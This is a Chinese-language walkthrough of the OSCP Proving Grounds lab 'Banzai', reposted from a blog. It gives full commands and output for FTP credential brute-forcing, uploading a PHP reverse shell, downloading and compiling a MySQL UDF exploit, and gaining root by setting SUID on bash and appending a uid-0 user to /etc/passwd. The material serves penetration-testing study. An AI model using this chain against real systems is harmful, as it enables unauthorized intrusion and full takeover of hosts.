自学内容网 自学内容网

OSCP靶场--Banzai

OSCP靶场–Banzai

考点(ftp爆破+ webshell上传+web1访问403+web2可以访问webshell反弹+mysql udf提权)

1.nmap扫描

## nmap扫描一定要使用 -p- 否则容易扫不全端口
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC 192.168.158.56 -Pn -p-  --min-rate 2500

Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-12 07:50 EDT
Nmap scan report for banzai.offseclabs.com (192.168.158.56)
Host is up (0.43s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT     STATE  SERVICE    VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp        vsftpd 3.0.3
22/tcp   open   ssh        OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 ba:3f:68:15:28:86:36:49:7b:4a:84:22:68:15:cc:d1 (RSA)
|   256 2d:ec:3f:78:31:c3:d0:34:5e:3f:e7:6b:77:b5:61:09 (ECDSA)
|_  256 4f:61:5c:cc:b0:1f:be:b4:eb:8f:1c:89:71:04:f0:aa (ED25519)
25/tcp   open   smtp       Postfix smtpd
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after:  2030-06-02T14:30:35
5432/tcp open   tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after:  2030-06-02T14:30:35
8080/tcp open   tcpwrapped
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.25 (Debian)
8295/tcp open   tcpwrapped
Service Info: Host:  banzai.offseclabs.com; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.15 seconds


2.user priv

## web:403
http://banzai.offseclabs.com:8080/

## 
### ftp密码爆破:
┌──(root㉿kali)-[~/Desktop]
└─# hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt  192.168.158.56 ftp -V
[ATTEMPT] target 192.168.158.56 - login "admin" - pass "admin" - 5 of 66 [child 4] (0/0)

[21][ftp] host: 192.168.158.56   login: admin   password: admin

#################
## ftp目录可写,并且显示存在php文件:
┌──(root㉿kali)-[/]
└─# ftp 192.168.158.56                                                                                             
Connected to 192.168.158.56.
220 (vsFTPd 3.0.3)
Name (192.168.158.56:root): admin
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||57570|)
ftp: Can't connect to `192.168.158.56:57570': Connection timed out
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    7 1001     0            4096 Apr 12 06:55 .
drwxr-xr-x    7 1001     0            4096 Apr 12 06:55 ..
drwxr-xr-x    2 1001     0            4096 May 26  2020 contactform
drwxr-xr-x    2 1001     0            4096 May 26  2020 css
drwxr-xr-x    3 1001     0            4096 May 26  2020 img
-rw-r--r--    1 1001     0           23364 May 27  2020 index.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 js
drwxr-xr-x   11 1001     0            4096 May 26  2020 lib
-rw-r--r--    1 1001     1001           29 Apr 12 06:55 test.html

######################################
## 上传webshell:
## https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
┌──(root㉿kali)-[~/Desktop]
└─# ftp 192.168.158.56
pftp> put lrshell.php
local: lrshelll.php remote: lrshelll.php
ftp: Can't open `lrshelll.php': No such file or directory
ftp> put lrshell.php 
local: lrshell.php remote: lrshell.php
150 Ok to send data.
100% |*************************************************************************************************************************************************|  5494       46.36 MiB/s    00:00 ETA
226 Transfer complete.
5494 bytes sent in 00:13 (0.41 KiB/s)
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     0            4096 May 26  2020 contactform
drwxr-xr-x    2 1001     0            4096 May 26  2020 css
drwxr-xr-x    3 1001     0            4096 May 26  2020 img
-rw-r--r--    1 1001     0           23364 May 27  2020 index.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 js
drwxr-xr-x   11 1001     0            4096 May 26  2020 lib
-rw-r--r--    1 1001     1001         5494 Apr 12 08:10 lrshell.php
-rw-r--r--    1 1001     1001           29 Apr 12 06:55 test.html
226 Directory send OK.


##################################
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 21                                                                 
listening on [any] 21 ...
connect to [192.168.45.195] from banzai.offseclabs.com [192.168.158.56] 51554
Linux banzai 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64 GNU/Linux
 08:11:38 up  2:27,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python
/usr/bin/python
python -c 'import pty;pty.spawn("bash")'
$ www-data@banzai:/$ ^Z
zsh: suspended  nc -lvvp 21
                                                                                                                                                                                              
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo ; fg      
[1]  + continued  nc -lvvp 21
                             reset
reset: unknown terminal type unknown
Terminal type? screen


###
##
www-data@banzai:/$ ls
bin   etc         initrd.img.old  lost+found  opt   run   sys  var
boot  home        lib             media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64           mnt         root  srv   usr  vmlinuz.old
www-data@banzai:/$ cd /home/
www-data@banzai:/home$ ls
banzai
www-data@banzai:/home$ cd banzai
www-data@banzai:/home/banzai$ ls
index.php  local.txt
www-data@banzai:/home/banzai$ cat local.txt
fb7134da79e00b3b7a0c2398f16416e8
www-data@banzai:/home/banzai$ 






在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
反弹shell:
在这里插入图片描述

在这里插入图片描述

3. root priv[udf mysql提权]

3.1 udf mysql提权

## linpeas枚举:
www-data@banzai:/var/www$ cat config.php                                                                                                                                                      
<?php                                                                                                                                                                                         
define('DBHOST', '127.0.0.1');                                                                                                                                                                
define('DBUSER', 'root');                                                                                                                                                                     
define('DBPASS', 'EscalateRaftHubris123');                                                                                                                                                    
define('DBNAME', 'main');                                                                                                                                                                     
?>    

### 并且mysql服务以root运行:
                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════                                                                                                            
                ╚════════════════════════════════════════════════╝                                                                                                                            
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes                                                                   
root         1  0.0  0.3 138920  6808 ?        Ss   05:43   0:00 /sbin/init                                                                                                                   
www-data 28829  0.0  0.3 269360  8116 ?        S    08:06   0:00  _ /usr/sbin/apache2 -k start
root       696  0.0  8.5 1122984 176164 ?      Sl   05:43   0:01 /usr/sbin/mysqld --daemonize --pid-file=/var/run/mysqld/mysqld.pid


############
##
www-data@banzai:/var/www$ cat /etc/passwd | grep -v nologin                                                                                                                                   
root:x:0:0:root:/root:/bin/bash                                                                                                                                                               
sync:x:4:65534:sync:/bin:/bin/sync                                                                                                                                                            
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false                                                                                                            
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false                                                                                                         
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false                                                                                                                 
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false                                                                                                                      
_apt:x:104:65534::/nonexistent:/bin/false                                                                                                                                                     
Debian-exim:x:105:109::/var/spool/exim4:/bin/false                                                                                                                                            
messagebus:x:106:110::/var/run/dbus:/bin/false                                                                                                                                                
banzai:x:1000:1000:Banzai,,,:/home/banzai:/bin/bash                                                                                                                                           
admin:x:1001:1001::/var/www/html/:                                                                                                                                                            
ftp:x:108:113:ftp daemon,,,:/srv/ftp:/bin/false                                                                                                                                               
mysql:x:109:114:MySQL Server,,,:/var/lib/mysql:/bin/false                                                                                                                                     
postfix:x:110:115::/var/spool/postfix:/bin/false                                                                                                                                              
postgres:x:111:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash     

#############
## 本地登陆mysql:
##
## 发现mysql密码或者root用户本地可以匿名登陆:
www-data@banzai:/var/www$ ls
ls
config.php  html
www-data@banzai:/var/www$ cat config.php
cat config.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'EscalateRaftHubris123');
define('DBNAME', 'main');
?>

## 且mysql以高权限运行:
ps aux | grep mysql
mysql -u root

## mysql登陆:
## udf提权:
https://github.com/AaronCaiii/OSCP-Prepare-Proving-grounds-Practice/blob/main/PG/5.%20Banzai.md
https://blog.csdn.net/Bossfrank/article/details/131424479
www-data@banzai:/var/www$ mysql -uroot -p
mysql -uroot -p
Enter password: EscalateRaftHubris123

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 5
Server version: 5.7.30 MySQL Community Server (GPL)

mysql> 

##
mysql> show variables like '%secure_file_priv%';
show variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.01 sec)

## 查看写入so文件的plugin位置:
mysql> show variables like '%plugin%';
show variables like '%plugin%';
+-------------------------------+------------------------+
| Variable_name                 | Value                  |
+-------------------------------+------------------------+
| default_authentication_plugin | mysql_native_password  |
| plugin_dir                    | /usr/lib/mysql/plugin/ |
+-------------------------------+------------------------+
2 rows in set (0.00 sec)

## 查看版本,选择对应的exp:
mysql> select version();
select version();
+-----------+
| version() |
+-----------+
| 5.7.30    |
+-----------+
1 row in set (0.01 sec)

##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit mysql udf 
------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                               |  Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library (1)                                       | linux/local/1181.c
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)                                      | linux/local/1518.c
MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution                                            | windows/remote/3274.txt
MySQL 4/5/6 - UDF for Command Execution                                                                      | linux/local/7856.txt
------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
------------------------------------------------------------------------------------------------------------- ---------------------------------
 Paper Title                                                                                                 |  Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
MySQL UDF Exploitation                                                                                       | docs/english/44139-mysql-udf-exp

##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m linux/local/1518.c     
  Exploit: MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)
      URL: https://www.exploit-db.com/exploits/1518
     Path: /usr/share/exploitdb/exploits/linux/local/1518.c
    Codes: N/A
 Verified: True
File Type: C source, ASCII text
Copied to: /root/Desktop/1518.c

## 准备udf提权的.so文件:
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 22
Serving HTTP on 0.0.0.0 port 22 (http://0.0.0.0:22/) ...
192.168.181.56 - - [25/Dec/2023 11:08:19] "GET /1518.c HTTP/1.1" 200 -

## 下载exp到目标机器,并使用gcc编译:
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 22
www-data@banzai:/tmp$ wget http://192.168.45.195:22/1518.c

##
www-data@banzai:/tmp$ ls
ls
1518.c  linpeas.sh  wget-log
www-data@banzai:/tmp$ mv 1518.c raptor_udf2.c
mv 1518.c raptor_udf2.c
www-data@banzai:/tmp$ ls
ls
linpeas.sh  raptor_udf2.c  wget-log  wget-log.1
www-data@banzai:/tmp$ gcc -g -c raptor_udf2.c -fPIC
gcc -g -c raptor_udf2.c -fPIC
www-data@banzai:/tmp$ ls
ls
linpeas.sh  raptor_udf2.c  raptor_udf2.o  wget-log  wget-log.1
www-data@banzai:/tmp$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
<,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
www-data@banzai:/tmp$ ls
ls
linpeas.sh  raptor_udf2.c  raptor_udf2.o  raptor_udf2.so  wget-log  wget-log.1

## root权限登陆数据库
www-data@banzai:/tmp$ mysql -uroot -p
mysql -uroot -p
Enter password: EscalateRaftHubris123

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.7.30 MySQL Community Server (GPL)

mysql> 

use mysql;
create table foo(line blob);

##
insert into foo values(load_file('/tmp/raptor_udf2.so'));
##
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
##
mysql> create function do_system returns integer soname 'raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
ERROR 1126 (HY000): Can't open shared library 'raptor_udf2.so' (errno: 11 /usr/lib/mysql/plugin/raptor_udf2.so: file too short)

##
但当我想创建一个说文件太短的函数时,我在谷歌上搜索了一下,也许是文件权限。我尝试在本地使用chmod,但没有用,然后我尝试使用ftp更改权限,终于成功了。
## ftp修改文件权限:
## nc文件传输:
.目标机器接收端:
nc -l -v 端口号>要写入的文件名(跟被传输文件名可以不一样)
nc -l -v 9999 > test1.jar

2.kali发送端:
nc -v 接收端的ip 端口号<被传输文件名
nc -v 192.168.xx.xxx 9999 < test.jar
######################
## kali编译:
mv 1518.c raptor_udf2.c

┌──(root㉿kali)-[~/Desktop]
└─# gcc -g -c raptor_udf2.c -fPIC
                                                                                                                                               
┌──(root㉿kali)-[~/Desktop]
└─# gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

## ftp上传:
┌──(root㉿kali)-[~/Desktop]
└─# ftp 192.168.181.56
Connected to 192.168.181.56.
220 (vsFTPd 3.0.3)
Name (192.168.181.56:root): admin
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
## ftp被动模式:
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> put raptor_udf2.so
local: raptor_udf2.so remote: raptor_udf2.so
200 EPRT command successful. Consider using EPSV.
150 Ok to send data.
100% |**************************************************************************************************| 17232      111.79 MiB/s    00:00 ETA
226 Transfer complete.
17232 bytes sent in 00:00 (22.15 KiB/s)
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001          328 Dec 25 08:30 cmd.php
-rw-r--r--    1 1001     1001         3046 Dec 25 08:39 cmd443.php
-rw-r--r--    1 1001     1001         3040 Dec 25 08:45 cmd80.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 contactform
drwxr-xr-x    2 1001     0            4096 May 26  2020 css
drwxr-xr-x    3 1001     0            4096 Dec 25 08:58 img
-rw-r--r--    1 1001     0           23364 May 27  2020 index.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 js
drwxr-xr-x   11 1001     0            4096 May 26  2020 lib
-rw-r--r--    1 1001     1001       830030 Dec 25 09:12 linpeas.sh
-rw-r--r--    1 1001     1001         5008 Dec 25 11:37 raptor_udf2.o
-rw-r--r--    1 1001     1001        17232 Dec 25 11:38 raptor_udf2.so
226 Directory send OK.
## ftp修改权限:
ftp> chmod 777 raptor_udf2.so
200 SITE CHMOD command ok.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001          328 Dec 25 08:30 cmd.php
-rw-r--r--    1 1001     1001         3046 Dec 25 08:39 cmd443.php
-rw-r--r--    1 1001     1001         3040 Dec 25 08:45 cmd80.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 contactform
drwxr-xr-x    2 1001     0            4096 May 26  2020 css
drwxr-xr-x    3 1001     0            4096 Dec 25 08:58 img
-rw-r--r--    1 1001     0           23364 May 27  2020 index.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 js
drwxr-xr-x   11 1001     0            4096 May 26  2020 lib
-rw-r--r--    1 1001     1001       830030 Dec 25 09:12 linpeas.sh
-rw-r--r--    1 1001     1001         5008 Dec 25 11:37 raptor_udf2.o
-rwxrwxrwx    1 1001     1001        17232 Dec 25 11:38 raptor_udf2.so
226 Directory send OK.
ftp> exit
221 Goodbye.

## 权限修改完成:udf提权:
mysql> use mysql;
use mysql;
Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.02 sec)

mysql> insert into foo values(load_file('/var/www/html/raptor_udf2.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.01 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.01 sec)

## cp一个bash,添加suid权限
mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

## 或者对/bin/bash添加suid权限:
## mysql> select do_system('chmod +s /bin/bash');
/bin/bash -p

##############
#
###########
## 或者修改/etc/passwd
mysql> select do_system('chmod 777 /etc/passwd');
+------------------------------------+
| do_system('chmod 777 /etc/passwd') |
+------------------------------------+
|                                  0 |
+------------------------------------+

## 退出数据库:
mysql> exit
exit
Bye

## 切换shell
## 
/tmp/rootbash -p

#####################
##
## /etc/passwd覆盖提权:
## 修改/etc/passwd提权:
www-data@banzai:/$ openssl passwd toor
openssl passwd toor
VjDzO6Mx5iRQs
www-data@banzai:/$ ls -al /etc/passwd
ls -al /etc/passwd
-rwxrwxrwx 1 root root 1702 Jun  5  2020 /etc/passwd
www-data@banzai:/$ echo "toor1:VjDzO6Mx5iRQs:0:0::/root/:/bin/bash" >> /etc/passwd
<VjDzO6Mx5iRQs:0:0::/root/:/bin/bash" >> /etc/passwd
www-data@banzai:/$ su toor1
su toor1
Password: toor

root@banzai:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@banzai:/# cat /root/proof.txt
cat /root/proof.txt
ed13c186ebf511f28ab5371d98dac018
root@banzai:/# 

 

4.总结:

## writeup
https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-banzai-a07932f899cf
https://al1z4deh.medium.com/proving-grounds-banzai-6cc4d6eea356
https://github.com/AaronCaiii/OSCP-Prepare-Proving-grounds-Practice/blob/main/PG/5.%20Banzai.md


原文地址:https://blog.csdn.net/qq_33168924/article/details/137690574

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!